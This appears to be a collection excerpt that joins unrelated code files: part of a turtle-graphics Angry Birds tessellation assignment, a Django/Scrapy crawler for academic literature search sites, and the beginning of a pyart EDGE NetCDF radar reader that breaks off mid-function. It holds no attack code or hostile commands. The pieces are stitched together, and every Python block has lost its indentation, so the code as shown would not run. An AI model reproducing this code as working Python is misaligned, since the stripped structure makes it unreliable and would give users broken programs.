circle(-10)
end_fill()
penup()
circle(40, extent = 150)
setheading(90)
forward(40)
### Eyes
setheading(180)
forward(30)
pendown()
pencolor('green')
dot(20)
pencolor('white')
dot(15)
pencolor('black')
dot(5)
penup()
setheading(0)
forward(25)
pendown()
pencolor('green')
dot(30)
pencolor('yellow green')
dot(25)
### Nose holes
penup()
setheading(180)
forward(5)
pendown()
pencolor('dark green')
dot(10)
setheading(0)
penup()
forward(10)
pendown()
dot(10)
penup()
forward(20)
pendown()
dot(20)
pencolor('white')
dot(15)
pencolor('black')
dot(5)
### Positioning
pencolor('dark green')
penup()
setheading(180)
forward(25)
setheading(270)
forward(20)
dot(15)
penup()
forward(-5)
pencolor('white')
pendown()
dot(5)
setheading(0)
forward(-5)
dot(5)
forward(10)
dot(5)
penup()
### TNT BOX
setheading(180)
forward(100)
setheading(270)
pencolor('saddle brown')
fillcolor('burlywood')
begin_fill()
pendown()
forward(25)
left(90)
forward(25)
left(90)
forward(25)
left(90)
forward(25)
penup()
left(90)
forward(15)
left(90)
forward(5)
end_fill()
pencolor('red')
write('TNT')
### TNT BOX
penup()
forward(15)
left(90)
forward(60)
setheading(270)
pencolor('saddle brown')
fillcolor('burlywood')
begin_fill()
pendown()
forward(25)
left(90)
forward(25)
left(90)
forward(25)
left(90)
forward(25)
penup()
left(90)
forward(15)
left(90)
forward(5)
end_fill()
pencolor('red')
write('TNT')
### TNT BOX
penup()
forward(120)
right(90)
forward(30)
pencolor('saddle brown')
fillcolor('burlywood')
begin_fill()
pendown()
forward(25)
left(90)
forward(25)
left(90)
forward(25)
left(90)
forward(25)
penup()
left(90)
forward(15)
left(90)
forward(5)
end_fill()
pencolor('red')
write('TNT')
def vertical(): ### The Blues
### Tile outline
setheading(0)
fillcolor('light coral')
begin_fill()
width(3)
pendown()
forward(100)
left(90)
forward(200)
left(90)
forward(100)
left(90)
forward(200)
end_fill()
penup()
### Positioning
setheading(0)
forward(30)
left(90)
forward(30)
### Body
fillcolor('steel blue')
begin_fill()
pendown()
setheading(0)
right(19)
circle(50, extent = 110)
setheading(90)
forward(40)
circle(50, extent = 50)
right(40)
circle(20, extent = 90)
left(30)
circle(20, extent = 20)
left(30)
circle(20, extent = 20)
left(40)
forward(15)
right(180)
forward(15)
circle(50, extent = 20)
left(30)
circle(20, extent = 30)
left(30)
circle(20, extent = 30)
left(50)
forward(10)
right(121)
circle(80, extent = 94)
end_fill()
### Positioning
penup()
setheading(90)
forward(90)
setheading(0)
forward(10)
### Left eye
pendown()
dot(30)
pencolor('white')
dot(25)
penup()
forward(7)
pendown()
pencolor('black')
dot(10)
### Positioning
penup()
forward(30)
### Right eye
pendown()
dot(30)
pencolor('white')
dot(25)
penup()
forward(7)
pendown()
pencolor('black')
dot(10)
### Positioning
penup()
setheading(270)
forward(15)
setheading(180)
forward(45)
### Orange bit under beak
fillcolor('firebrick')
begin_fill()
pendown()
left(130)
circle(50, extent = 60)
left(90)
forward(18)
left(80)
forward(40)
end_fill()
### Positioning
penup()
left(55)
forward(20)
left(170)
### Beak
fillcolor('orange')
begin_fill()
pendown()
forward(30)
right(75)
forward(45)
setheading(180)
forward(60)
end_fill()
fillcolor('orange')
begin_fill()
setheading(270)
left(30)
forward(20)
left(80)
forward(42)
end_fill()
penup()
def broken_tile_two_by_two(): ### Broken Red
setheading(0)
width(3)
fillcolor('steel blue')
begin_fill()
pendown()
forward(200)
left(90)
forward(200)
left(90)
forward(200)
left(90)
forward(200)
end_fill()
penup()
setheading(0)
forward(100)
left(90)
forward(100)
pencolor('black')
dot(170)
left(180)
forward(100)
right(90)
forward(100)
setheading(270)
# positioning of the body
forward(-120)
right(90)
forward(-60)
left(90)
#### body
width(5)
fillcolor('Firebrick')
begin_fill()
pendown()
right(45)
circle(60, extent = 270)
right(45)
circle(50, extent = 70)
left(30)
circle(50, extent = 10 )
left(30)
circle(50, extent = 10 )
left(30)
circle(50, extent = 40 )
right(190)
circle(50, extent = 60 )
left(30)
circle(50, extent = 20 )
left(30)
circle(50, extent = 20 )
left(70)
forward(10)
end_fill()
penup()
width(3)
# positioning
forward(70)
#Brows
fillcolor('black')
begin_fill()
pendown()
right(140)
forward(30)
right(60)
forward(30)
left(80)
forward(10)
left(105)
forward(35)
left(50)
forward(35)
left(80)
forward(10)
end_fill()
penup()
# positioning
forward(3)
right(90)
forward(-56)
left(90)
#left eye
fillcolor('white')
begin_fill()
pendown()
left(100)
circle(20, extent = 30)
left(30)
circle(20, extent = 40)
left(30)
circle(20, extent = 80)
left(30)
forward(2)
end_fill()
penup()
#positioning
right(90)
forward(10)
left(90)
#right eye
pendown()
fillcolor('white')
begin_fill()
pendown()
left(175)
circle(20, extent = 30)
left(30)
circle(20, extent = 40)
left(30)
circle(20, extent = 80)
left(30)
forward(2)
end_fill()
penup()
## positioning
setheading(180)
forward(9)
left(90)
forward(15)
#### Eye dot right
pendown()
dot(10)
penup()
## positioning
setheading(180)
forward(35)
left(90)
forward(-4)
#### Eye dot left
pendown()
dot(10)
penup()
#position
setheading(270)
forward(50)
setheading(0)
forward(57)
setheading(90)
# belly
fillcolor('wheat')
begin_fill()
pendown()
left(50)
circle(50, extent = 94)
setheading(0)
right(38)
circle(50, extent = 94)
end_fill()
penup()
#### position
left(90)
forward(70)
right(90)
right(30)
forward(18)
left(30)
###beak
width(3)
fillcolor('Orange')
begin_fill()
pendown()
left(170)
circle(50, extent = 30)
left(120)
forward(30)
left(120)
forward(25)
end_fill()
penup()
##position
setheading(270)
forward(22)
## bottom part of beak
width(2)
fillcolor('Dark Orange')
begin_fill()
pendown()
left(45)
forward(10)
left(100)
forward(12)
left(135)
forward(12)
end_fill()
penup()
### Crack
fillcolor('lightblue')
forward(110)
left(90)
forward(50)
setheading(45)
pendown()
begin_fill()
width(5)
pencolor('black')
forward(40)
left(45)
forward(20)
right(30)
forward(40)
left(40)
forward(30)
right(60)
forward(40)
right(30)
forward(40)
right(20)
forward(20)
left(60)
forward(75)
left(180)
forward(75)
left(30)
forward(20)
left(45)
forward(20)
right(42)
forward(30)
right(25)
forward(50)
right(30)
forward(50)
right(45)
forward(45)
end_fill()
penup()
def broken_one_by_one(): ### Broken Chuck
### Tile outline
setheading(0)
pendown()
setheading(0)
width(3)
pencolor('black')
fillcolor('beige')
begin_fill()
forward(100)
left(90)
forward(100)
left(90)
forward(100)
left(90)
forward(100)
end_fill()
penup()
### Positioning
setheading(0)
forward(20)
left(90)
forward(10)
### Body
width(3)
fillcolor('yellow')
begin_fill()
pendown()
right(100)
circle(200, extent = 20)
left(90)
circle(200, extent = 20)
left(100)
circle(200, extent = 24)
left(120)
forward(5)
end_fill()
### Positioning
penup()
setheading(0)
forward(50)
left(90)
forward(60)
### Spikey Hair
fillcolor('black')
begin_fill()
pendown()
right(50)
circle(20, extent = 70)
right(220)
forward(10)
right(110)
circle(30, extent = 40)
left(120)
forward(15)
right(150)
circle(30, extent = 40)
left(130)
forward(20)
end_fill()
### Positioning
penup()
setheading(0)
right(90)
forward(25)
right(90)
forward(5)
### Eyes
penup()
right(90)
forward(-8)
pendown()
pencolor('black')
dot(15)
pencolor('white')
dot(10)
pencolor('black')
dot(5)
penup()
right(90)
forward(20)
pendown()
pencolor('black')
dot(15)
pencolor('white')
dot(10)
pencolor('black')
dot(5)
penup()
### Positioning
left(180)
forward(20)
left(90)
forward(12)
left(100)
### Beak
fillcolor('orange')
begin_fill()
pendown()
width(2)
forward(15)
right(20)
forward(15)
setheading(180)
left(10)
forward(10)
left(90)
forward(10)
left(10)
forward(10)
setheading(180)
right(40)
forward(32)
end_fill()
### Positioning
penup()
setheading(180)
forward(9)
setheading(90)
forward(25)
### Left eye brow
pendown()
pencolor('firebrick')
fillcolor('firebrick')
begin_fill()
setheading(0)
forward(20)
left(90)
forward(2)
left(90)
forward(20)
left(90)
forward(2)
end_fill()
### Positioning
penup()
setheading(0)
forward(20)
setheading(90)
forward(5)
setheading(0)
### Right eye brow
pendown()
pencolor('firebrick')
fillcolor('firebrick')
begin_fill()
setheading(0)
forward(20)
left(90)
forward(2)
left(90)
forward(20)
left(90)
forward(2)
end_fill()
penup()
### Cracked portion
right(90)
forward(60)
left(90)
forward(50)
setheading(0)
width(5)
pencolor('black')
left(45)
pendown()
fillcolor('light blue')
begin_fill()
forward(20)
left(45)
forward(20)
right(25)
forward(25)
left(25)
forward(10)
right(65)
forward(40)
setheading(90)
forward(10)
setheading(270)
forward(10)
left(55)
forward(40)
setheading(270)
forward(40)
setheading(180)
forward(60)
left(25)
forward(20)
end_fill()
penup()
def broken_horizontal(): ### Broken Bad Piggie
### Tile outline
setheading(0)
fillcolor('sandy brown')
begin_fill()
width(3)
pendown()
forward(200)
left(90)
forward(100)
left(90)
forward(200)
left(90)
forward(100)
end_fill()
penup()
### Positioning
setheading(0)
forward(100)
setheading(90)
forward(5)
### Body
pencolor('dark green')
fillcolor('lawn green')
begin_fill()
pendown()
setheading(0)
circle(40)
end_fill()
### Ears
penup()
circle(40, extent = 130)
pendown()
fillcolor('lawn green')
begin_fill()
circle(-10)
end_fill()
penup()
circle(40, extent = 90)
pendown()
fillcolor('lawn green')
begin_fill()
circle(-10)
end_fill()
penup()
circle(40, extent = 150)
setheading(90)
forward(40)
### Eyes
setheading(180)
forward(30)
pendown()
pencolor('green')
dot(20)
pencolor('white')
dot(15)
pencolor('black')
dot(5)
penup()
setheading(0)
forward(25)
pendown()
pencolor('green')
dot(30)
pencolor('yellow green')
dot(25)
### Nose holes
penup()
setheading(180)
forward(5)
pendown()
pencolor('dark green')
dot(10)
setheading(0)
penup()
forward(10)
pendown()
dot(10)
penup()
forward(20)
pendown()
dot(20)
pencolor('white')
dot(15)
pencolor('black')
dot(5)
### Positioning
pencolor('dark green')
penup()
setheading(180)
forward(25)
setheading(270)
forward(20)
dot(15)
penup()
forward(-5)
pencolor('white')
pendown()
dot(5)
setheading(0)
forward(-5)
dot(5)
forward(10)
dot(5)
penup()
### TNT BOX
setheading(180)
forward(100)
setheading(270)
pencolor('saddle brown')
fillcolor('burlywood')
begin_fill()
pendown()
forward(25)
left(90)
forward(25)
left(90)
forward(25)
left(90)
forward(25)
penup()
left(90)
forward(15)
left(90)
forward(5)
end_fill()
pencolor('red')
write('TNT')
### TNT BOX
penup()
forward(15)
left(90)
forward(60)
setheading(270)
pencolor('saddle brown')
fillcolor('burlywood')
begin_fill()
pendown()
forward(25)
left(90)
forward(25)
left(90)
forward(25)
left(90)
forward(25)
penup()
left(90)
forward(15)
left(90)
forward(5)
end_fill()
pencolor('red')
write('TNT')
### TNT BOX
penup()
forward(120)
right(90)
forward(30)
pencolor('saddle brown')
fillcolor('burlywood')
begin_fill()
pendown()
forward(25)
left(90)
forward(25)
left(90)
forward(25)
left(90)
forward(25)
penup()
left(90)
forward(15)
left(90)
forward(5)
end_fill()
pencolor('red')
write('TNT')
### Cracked portion
setheading(180)
forward(156)
setheading(0)
fillcolor('light blue')
begin_fill()
pendown()
width(5)
pencolor('black')
forward(20)
left(65)
forward(40)
right(25)
forward(40)
right(35)
forward(40)
right(65)
forward(30)
left(65)
forward(30)
right(25)
forward(20)
left(25)
forward(24)
left(180)
forward(24)
left(65)
forward(40)
right(60)
forward(20)
right(20)
forward(60)
left(30)
forward(30)
right(35)
forward(30)
penup()
end_fill()
def broken_vertical(): ### Broken The Blues
# Tile outline
setheading(0)
fillcolor('light coral')
begin_fill()
width(3)
pendown()
forward(100)
left(90)
forward(200)
left(90)
forward(100)
left(90)
forward(200)
end_fill()
penup()
### Positioning
setheading(0)
forward(30)
left(90)
forward(30)
### Body
fillcolor('steel blue')
begin_fill()
pendown()
setheading(0)
right(19)
circle(50, extent = 110)
setheading(90)
forward(40)
circle(50, extent = 50)
right(40)
circle(20, extent = 90)
left(30)
circle(20, extent = 20)
left(30)
circle(20, extent = 20)
left(40)
forward(15)
right(180)
forward(15)
circle(50, extent = 20)
left(30)
circle(20, extent = 30)
left(30)
circle(20, extent = 30)
left(50)
forward(10)
right(121)
circle(80, extent = 94)
end_fill()
### Positioning
penup()
setheading(90)
forward(90)
setheading(0)
forward(10)
### Left eye
pendown()
dot(30)
pencolor('white')
dot(25)
penup()
forward(7)
pendown()
pencolor('black')
dot(10)
### Positioning
penup()
forward(30)
### Right eye
pendown()
dot(30)
pencolor('white')
dot(25)
penup()
forward(7)
pendown()
pencolor('black')
dot(10)
### Positioning
penup()
setheading(270)
forward(15)
setheading(180)
forward(45)
### Orange bit under beak
fillcolor('firebrick')
begin_fill()
pendown()
left(130)
circle(50, extent = 60)
left(90)
forward(18)
left(80)
forward(40)
end_fill()
### Positioning
penup()
left(55)
forward(20)
left(170)
### Beak
fillcolor('orange')
begin_fill()
pendown()
forward(30)
right(75)
forward(45)
setheading(180)
forward(60)
end_fill()
fillcolor('orange')
begin_fill()
setheading(270)
left(30)
forward(20)
left(80)
forward(42)
end_fill()
penup()
# Cracked portion
forward(20)
setheading(180)
width(5)
pendown()
fillcolor('light blue')
begin_fill()
left(65)
forward(80)
right(25)
forward(20)
right(55)
forward(30)
right(90)
forward(50)
left(30)
forward(20)
right(30)
forward(50)
left(30)
forward(40)
right(90)
forward(30)
right(90)
forward(50)
left(90)
forward(28)
penup()
end_fill()
# Fill the grid with tiles as per the provided dataset
def tessellate(random_pattern):
#######################################################################
### This first section sets up the loop that walks through the entire list generated by random_pattern
position = 0
while position < len(random_pattern):
length = len(random_pattern[position])
position = position + 1
#######################################################################
### This section is for the random patterns featuring lists of length 3
if length == 3:
if (((random_pattern[position - 1])[0])[1]) == (((random_pattern[position - 1])[1])[1]):
if str(((random_pattern[position - 1])[2])) == 'O': # Case where pattern ends with O.
### Co-ordinates x_pos (horizontal position) and y_pos (vertical position) determination. ###
x_pos = ord(((random_pattern[position - 1])[0])[0]) - 60
y_pos = int(((random_pattern[position - 1])[0])[1])
### Using x_pos and y_pos, a linear mapping calculates the position on the grid. ###
goto(((100*x_pos) - 1000), ((int(y_pos) *100) - 450))
pencolor('black')
horizontal() # What it draws
elif str(((random_pattern[position - 1])[2])) == 'X': # Case where pattern ends with X.
### Co-ordinates x_pos (horizontal position) and y_pos (vertical position) determination. ###
x_pos = ord(((random_pattern[position - 1])[0])[0]) - 60
y_pos = int(((random_pattern[position - 1])[0])[1])
### Using x_pos and y_pos, a linear mapping calculates the position on the grid. ###
goto(((100*x_pos) - 1000), ((int(y_pos) *100) - 450))
pencolor('black')
broken_horizontal() # What it draws
else: # Length-3 lists cover two cases, horizontal and vertical; this else handles the second (vertical) case.
if str(((random_pattern[position - 1])[2])) == 'O': # Case where pattern ends with O.
### Co-ordinates x_pos (horizontal position) and y_pos (vertical position) determination. ###
x_pos = ord(((random_pattern[position - 1])[0])[0]) - 60
y_pos = int(((random_pattern[position - 1])[0])[1])
### Using x_pos and y_pos, a linear mapping calculates the position on the grid. ###
goto(((100*x_pos) - 1000), ((int(y_pos) *100) - 450))
pencolor('black')
vertical() # What it draws
elif str(((random_pattern[position - 1])[2])) == 'X': # Case where pattern ends with X.
### Co-ordinates x_pos (horizontal position) and y_pos (vertical position) determination. ###
x_pos = ord(((random_pattern[position - 1])[0])[0]) - 60
y_pos = int(((random_pattern[position - 1])[0])[1])
### Using x_pos and y_pos, a linear mapping calculates the position on the grid. ###
goto(((100*x_pos) - 1000), ((int(y_pos) *100) - 450))
pencolor('black')
broken_vertical() # What it draws
#######################################################################
### This section is for the random patterns featuring lists of length 5
elif length == 5:
if str(((random_pattern[position - 1])[4])) == 'O': # Case where pattern ends with O.
### Co-ordinates x_pos (horizontal position) and y_pos (vertical position) determination. ###
x_pos = ord(((random_pattern[position - 1])[0])[0]) - 60
y_pos = int(((random_pattern[position - 1])[0])[1])
### Using x_pos and y_pos, a linear mapping calculates the position on the grid. ###
goto(((100*x_pos) - 1000), ((int(y_pos) *100) - 450))
pencolor('black')
two_by_two() # What it draws
elif str(((random_pattern[position - 1])[4])) == 'X': # Case where pattern ends with X.
### Co-ordinates x_pos (horizontal position) and y_pos (vertical position) determination. ###
x_pos = ord(((random_pattern[position - 1])[0])[0]) - 60
y_pos = int(((random_pattern[position - 1])[0])[1])
### Using x_pos and y_pos, a linear mapping calculates the position on the grid. ###
goto(((100*x_pos) - 1000), ((int(y_pos) *100) - 450))
pencolor('black')
broken_tile_two_by_two() # What it draws
######################################################################
### This section is for the random patterns featuring lists of length 2
elif length == 2:
if str(((random_pattern[position - 1])[1])) == 'O': # Case where pattern ends with O.
### Co-ordinates x_pos and y_pos determination.
x_pos = ord(((random_pattern[position - 1])[0])[0]) - 60 # Finds x position using ord() of the first letter of the list.
y_pos = int(((random_pattern[position - 1])[0])[1])
### Using x_pos and y_pos, a linear mapping calculates the position on the grid. ###
goto(((100*x_pos) - 1000), ((int(y_pos) *100) - 450))
pencolor('black')
one_by_one() # What it draws
elif str(((random_pattern[position - 1])[1])) == 'X': # Case where pattern ends with X.
### Co-ordinates x_pos and y_pos determination.
x_pos = ord(((random_pattern[position - 1])[0])[0]) - 60 # Finds x position using ord() of the first letter of the list.
y_pos = int(((random_pattern[position - 1])[0])[1])
### Using x_pos and y_pos, a linear mapping calculates the position on the grid. ###
goto(((100*x_pos) - 1000), ((int(y_pos) *100) - 450))
pencolor('black')
broken_one_by_one() # What it draws
# ord() converts a letter to its character code
# chr() converts a character code back to a letter
#
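# Worked example of the grid mapping used in tessellate(): a cell label
# such as 'A3' is turned into canvas coordinates by taking ord() of the
# column letter and int() of the row digit, then applying the linear
# mapping above. For the label 'A3':
#     x_pos = ord('A') - 60                        # 65 - 60 = 5
#     y_pos = int('3')                             # 3
#     goto(100 * x_pos - 1000, 100 * y_pos - 450)  # goto(-500, -150)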
#--------------------------------------------------------------------#
#-----Main Program---------------------------------------------------#
#
# This main program sets up the background, ready for you to start
# drawing your solution. Do not change any of this code except
# as indicated by the comments marked '*****'.
#
# Set up the drawing canvas
# ***** You can change the background and line colours, and choose
# ***** whether or not to draw the grid and mark the places for the
# ***** legend, by providing arguments to this function call
create_drawing_canvas()
tracer(False)
penup()
goto(-750,100)
two_by_two()
penup()
goto(-750,70)
pendown()
pencolor('black')
write('Red', font =("Arial", 18, "normal"))
penup()
goto(-700,-100)
one_by_one()
goto(-700,-130)
pendown()
pencolor('black')
write('Chuck', font =("Arial", 18, "normal"))
penup()
goto(600, 100)
pencolor('black')
vertical()
penup()
goto(600,70)
pendown()
pencolor('black')
write('The Blues', font =("Arial", 18, "normal"))
penup()
goto(550, -100)
horizontal()
penup()
goto(550,-130)
pendown()
pencolor('black')
write('Bad Piggies', font =("Arial", 18, "normal"))
penup()
# Control the drawing speed
# ***** Change the following argument if you want to adjust
# ***** the drawing speed
speed('fastest')
# Decide whether or not to show the drawing being done step-by-step
# ***** Set the following argument to False if you don't want to wait
# ***** forever while the cursor moves slowly around the screen
tracer(False)
# Give the drawing canvas a title
# ***** Replace this title with a description of your solution's theme
# ***** and its tiles
title("Angry Birds & Piggies")
### Call the student's function to follow the path
### ***** While developing your program you can call the tessellate
### ***** function with one of the "fixed" data sets, but your
### ***** final solution must work with "random_pattern()" as the
### ***** argument. Your tessellate function must work for any data
### ***** set that can be returned by the random_pattern function.
#tessellate(fixed_pattern_0) # <-- used for code development only, not marking
tessellate(random_pattern()) # <-- used for assessment
# Exit gracefully
# ***** Change the default argument to False if you want the
# ***** cursor (turtle) to remain visible at the end of the
# ***** program as a debugging aid
release_drawing_canvas()
#
#--------------------------------------------------------------------#
``` |
{
"source": "josephHai/LiteratureRetrieval",
"score": 3
} |
#### File: crawler/crawler/urls.py
```python
from urllib.parse import urlencode
from scrapy.utils.project import get_project_settings
max_page = get_project_settings()['MAX_PAGE'] + 1
def wf(keywords):
for page in range(1, max_page):
params = {
'beetlansyId': 'aysnsearch',
'searchType': 'all',
'pageSize': 50,
'page': page,
'searchWord': keywords,
'order': 'correlation',
'showType': 'detail',
'isCheck': 'check',
'firstAuthor': 'false',
'corePerio': 'false',
'alreadyBuyResource': 'false',
'navSearchType': 'all'
}
yield 'http://www.wanfangdata.com.cn/search/searchList.do?' + urlencode(params)
def ixs(keywords):
for page in range(1, max_page):
params = {
'search_type': '',
'q': keywords,
'page': page
}
yield 'https://www.ixueshu.com/search/index.html?' + urlencode(params)
def wp(keywords):
param = {}
for page in range(1, max_page):
param['ObjectType'] = 1
param['ClusterUse'] = 'Article'
param['UrlParam'] = 'u={}'.format(keywords)
param['Sort'] = 0
param['UserID'] = 189654
param['PageNum'] = page
param['PageSize'] = 100
param['ShowRules'] = '任意字段={}'.format(keywords)  # "any field = <keywords>" search rule
yield {'searchParamModel': str(param)}
```
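A minimal sketch of how these generators are consumed. The keyword and page
bound below are illustrative stand-ins; in the project itself `max_page`
comes from the Scrapy `MAX_PAGE` setting and the real query strings carry
more parameters.
```python
from urllib.parse import urlencode

def wf_demo(keywords, max_page=3):
    # Same construction as wf(), with the page bound passed in directly
    # instead of read from the Scrapy settings.
    for page in range(1, max_page + 1):
        params = {'searchWord': keywords, 'page': page, 'pageSize': 50}
        yield 'http://www.wanfangdata.com.cn/search/searchList.do?' + urlencode(params)

for url in wf_demo('radar'):
    print(url)  # one search-results URL per page
```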
#### File: crawler/crawler/utils.py
```python
from os.path import realpath, dirname
import json
def get_config(name):
path = dirname(realpath(__file__)) + '/configs/' + name + '.json'
with open(path, 'r', encoding='utf-8') as f:
return json.loads(f.read())
def update_config(name, data):
path = dirname(realpath(__file__)) + '/configs/' + name + '.json'
with open(path, 'w', encoding='utf-8') as f:
json.dump(data, f, ensure_ascii=False, indent=1)
```
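A short sketch of the read-modify-write cycle these helpers implement; the
temporary directory and sample config below stand in for the project's
`configs/` folder.
```python
import json
import os
import tempfile

configs = tempfile.mkdtemp()  # stands in for crawler/configs/
path = os.path.join(configs, 'wf.json')

# seed a config file shaped like the ones the spiders read
with open(path, 'w', encoding='utf-8') as f:
    json.dump({'spider': 'literature', 'start_urls': {'args': []}}, f)

# read, modify, write back -- the same cycle run() performs per spider
with open(path, 'r', encoding='utf-8') as f:
    cfg = json.load(f)
cfg['start_urls']['args'] = ['radar meteorology']
with open(path, 'w', encoding='utf-8') as f:
    json.dump(cfg, f, ensure_ascii=False, indent=1)
```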
#### File: backend/crawler/run.py
```python
import os
import time
import logging
from scrapy.utils.project import get_project_settings
from scrapy.crawler import CrawlerProcess
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from celery import shared_task
from django.core.cache import cache
from pyhanlp import *
from jpype import *
from nltk.corpus import stopwords
from backend.crawler.crawler.utils import get_config, update_config
from ..models import Content
logger = logging.getLogger(__name__)
@shared_task()
def run(kw, source):
os.chdir('/home/respeaker/LiteratureRetrieval/backend/crawler')
names = source
project_settings = get_project_settings()
process = CrawlerProcess(project_settings)
for name in names:
custom_settings = get_config(name)
custom_settings['start_urls']['args'] = [kw]
update_config(name, custom_settings)
spider = custom_settings.get('spider', 'literature')
process.crawl(spider, **{'name': name})
process.start(stop_after_crawl=False)
class Worker:
def __init__(self, kw, source):
self.source = source
self.kw = self.handle_kw(kw)
def get_data(self, page_num, page_size):
if self.kw == '':
return [], 0
logger.info('Current keyword: {}'.format(self.kw))
logger.info('Checking whether this is the first request')
if self.is_first_request():
Content.objects.all().delete()
logger.info('Starting the crawler')
current = time.time()
# start the crawler (dispatched asynchronously via Celery)
run.delay(self.kw, self.source)
logger.info('Startup finished, took {}s'.format(time.time() - current))
i = 0
while not self.data_count():
if i >= 10:
break
i = i + 1
time.sleep(1)
# fetch the data from the database
data = Content.objects.values('title', 'authors', 'brief', 'source', 'website')
paginator = Paginator(data, page_size)
try:
literature = paginator.page(page_num)
except PageNotAnInteger:
literature = paginator.page(1)
except EmptyPage:
literature = paginator.page(paginator.num_pages)
literature = list(literature)
for index, item in enumerate(literature):
sources = item['source'].split('||')
websites = item['website'].split('||')
links = list(set(sources))
links.sort(key=sources.index)
names = list(set(websites))
names.sort(key=websites.index)
literature[index]['sources'] = [{'link': link, 'name': name} for (link, name) in zip(links, names)]  # pair the de-duplicated links with their site names
return literature, self.data_count()
def is_first_request(self):
if cache.has_key('kw') and cache.get('kw') == self.kw:
return False
else:
cache.set('kw', self.kw)
return True
@staticmethod
def handle_kw(kw, top=10):
s1 = []
allow_pos = ['g', 'gb', 'gbc', 'gc', 'gg', 'gi', 'gm', 'gp', 'n', 'nb', 'nba', 'nbc', 'nbp', 'nf', 'ng', 'nh',
'nhd', 'nhm', 'ni', 'nic', 'nis', 'nit', 'nl', 'nm', 'nmc', 'nn', 'nnd', 'nnt', 'nr', 'nr1', 'nr2',
'nrf', 'nrj', 'ns', 'nsf', 'nt', 'ntc', 'ntcb', 'ntcf', 'ntch', 'nth', 'nto', 'nts', 'ntu', 'nx',
'nz']
stop_words = stopwords.words('chinese')
IndexTokenizer = JClass('com.hankcs.hanlp.tokenizer.IndexTokenizer')
for term in IndexTokenizer.segment(kw):
word, pos = term.word, term.nature
if word not in stop_words and pos.__str__() in allow_pos:
s1.append(word)
return ' '.join(s1)
@staticmethod
def data_count():
return Content.objects.all().count()
if __name__ == '__main__':
now = time.time()
run('่ฎก็ฎๆบ', ['wp'])
print(time.time() - now)
```
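A sketch of what `Worker.handle_kw` does in isolation, assuming `pyhanlp`
and NLTK's Chinese stopword list are installed. For brevity it keeps any
part of speech starting with 'n', a simplification of the full allow_pos
list above.
```python
import pyhanlp  # noqa: F401 -- importing starts the JVM with HanLP loaded
from jpype import JClass
from nltk.corpus import stopwords

stop_words = set(stopwords.words('chinese'))
IndexTokenizer = JClass('com.hankcs.hanlp.tokenizer.IndexTokenizer')

kept = []
for term in IndexTokenizer.segment('文献检索系统'):
    # keep noun-like terms that are not stopwords
    if term.word not in stop_words and str(term.nature).startswith('n'):
        kept.append(term.word)
print(' '.join(kept))  # space-joined keywords, as handle_kw returns
```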
#### File: LiteratureRetrieval/backend/views.py
```python
import json
from django.http import HttpResponse
from django.db.models import F
from .crawler.run import Worker
from .models import *
def search(request):
keywords = request.GET.get('kw', '')
page = request.GET.get('page', 1)
limit = request.GET.get('limit', 10)
source = request.GET.get('sources', '["wp", "wf", "ixs"]')
source = json.loads(source)
worker = Worker(keywords, source)
literature, total = worker.get_data(int(page), limit)
response = json.dumps({'code': 200, 'data': {'total': total, 'items': literature}}, ensure_ascii=False)
return HttpResponse(response)
def get_source_list(request):
sources = Source.objects.annotate(en=F('short_name'), value=F('name')).values('en', 'name', 'url')
response = json.dumps({'code': 200, 'data': list(sources)}, ensure_ascii=False)
return HttpResponse(response)
``` |
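A hypothetical client-side sketch of calling the `search` view. The
`/search/` route and host are assumptions, since the project's URLconf is
not shown here.
```python
import json
from urllib.parse import urlencode
from urllib.request import urlopen

query = urlencode({'kw': 'radar', 'page': 1, 'limit': 10,
                   'sources': json.dumps(['wf', 'ixs'])})
with urlopen('http://localhost:8000/search/?' + query) as resp:
    payload = json.loads(resp.read().decode('utf-8'))
print(payload['code'], payload['data']['total'])
```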
{
"source": "josephhardinee/pyart",
"score": 3
} |
#### File: pyart/aux_io/edge_netcdf.py
```python
import datetime
import numpy as np
import netCDF4
from ..config import FileMetadata, get_fillvalue
from ..io.common import make_time_unit_str, _test_arguments
from ..core.radar import Radar
def read_edge_netcdf(filename, **kwargs):
"""
Read a EDGE NetCDF file.
Parameters
----------
filename : str
Name of EDGE NetCDF file to read data from.
Returns
-------
radar : Radar
Radar object.
"""
# test for non empty kwargs
_test_arguments(kwargs)
# create metadata retrieval object
filemetadata = FileMetadata('edge_netcdf')
# Open netCDF4 file
dset = netCDF4.Dataset(filename)
nrays = len(dset.dimensions['Azimuth'])
nbins = len(dset.dimensions['Gate'])
# latitude, longitude and altitude
latitude = filemetadata('latitude')
longitude = filemetadata('longitude')
altitude = filemetadata('altitude')
latitude['data'] = np.array([dset.Latitude], 'float64')
longitude['data'] = np.array([dset.Longitude], 'float64')
altitude['data'] = np.array([dset.Height], 'float64')
# metadata
metadata = filemetadata('metadata')
metadata_mapping = {
'vcp-value': 'vcp',
'radarName-value': 'radar_name',
'ConversionPlugin': 'conversion_software',
}
for netcdf_attr, metadata_key in metadata_mapping.items():
if netcdf_attr in dset.ncattrs():
metadata[metadata_key] = dset.getncattr(netcdf_attr)
# sweep_start_ray_index, sweep_end_ray_index
sweep_start_ray_index = filemetadata('sweep_start_ray_index')
sweep_end_ray_index = filemetadata('sweep_end_ray_index')
sweep_start_ray_index['data'] = np.array([0], dtype='int32')
sweep_end_ray_index['data'] = np.array([nrays-1], dtype='int32')
# sweep number
sweep_number = filemetadata('sweep_number')
sweep_number['data'] = np.array([0], dtype='int32')
# sweep_type
scan_type = 'ppi'
# sweep_mode, fixed_angle
sweep_mode = filemetadata('sweep_mode')
fixed_angle = filemetadata('fixed_angle')
sweep_mode['data'] = np.array(1 * ['azimuth_surveillance'])
fixed_angle['data'] = np.array([dset.Elevation], dtype='float32')
# time
time = filemetadata('time')
start_time = datetime.datetime.utcfromtimestamp(dset.Time)
time['units'] = make_time_unit_str(start_time)
time['data'] = np.zeros((nrays, ), dtype='float64')
# range
_range = filemetadata('range')
step = float(dset.getncattr('MaximumRange-value')) / nbins * 1000.
_range['data'] = (np.arange(nbins, dtype='float32') * step + step / 2)
_range['meters_to_center_of_first_gate'] = step / 2.
_range['meters_between_gates'] = step
# elevation
elevation = filemetadata('elevation')
elevation_angle = dset.Elevation
elevation['data'] = np.ones((nrays, ), dtype='float32') * elevation_angle
# azimuth
azimuth = filemetadata('azimuth')
azimuth['data'] = dset.variables['Azimuth'][:]
# fields
field_name = dset.TypeName
field_data = np.ma.array(dset.variables[field_name][:])
if 'MissingData' in dset.ncattrs():
field_data[field_data == dset.MissingData] = np.ma.masked
if 'RangeFolded' in dset.ncattrs():
field_data[field_data == dset.RangeFolded] = np.ma.masked
